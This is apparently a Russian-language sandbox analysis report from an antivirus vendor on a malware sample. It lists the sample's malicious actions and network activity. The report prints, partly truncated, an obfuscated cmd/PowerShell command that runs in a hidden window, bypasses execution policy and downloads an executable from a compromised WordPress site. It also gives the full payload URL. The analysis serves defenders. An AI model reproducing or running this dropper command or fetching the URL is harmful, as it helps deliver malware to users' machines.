Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- http://gogetsitdone.com/sandbox/wp-content/plugins/cherry-plugin/h6bqmer6/3rwkwglp.exe как %appdata%.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c "poWeRsHelL.eXE ^-^EXEcutI^ON^P^oLIC^Y^ ^BYPAss -n^O^p^Ro^File ^-^WINDo^wSTyle^ h^idd^EN (^New^-^ObJ^ECt^ SY^S^tE^M.n^Et.^wEb^C^l^IeNT).D^O^w^nL^oAdfilE('http://gogetsitdone.com/s...
Сетевая активность
Подключается к
- 'go####itdone.com':80
- 'go####itdone.com':443
TCP
Запросы HTTP GET
- http://go####itdone.com/sandbox/wp-content/plugins/cherry-plugin/H6bqmEr6/3RwKwGLp.exe
Другие
- 'go####itdone.com':443
UDP
- DNS ASK go####itdone.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c "poWeRsHelL.eXE ^-^EXEcutI^ON^P^oLIC^Y^ ^BYPAss -n^O^p^Ro^File ^-^WINDo^wSTyle^ h^idd^EN (^New^-^ObJ^ECt^ SY^S^tE^M.n^Et.^wEb^C^l^IeNT).D^O^w^nL^oAdfilE('http://gogetsitdone.com/s...' (со скрытым окном)
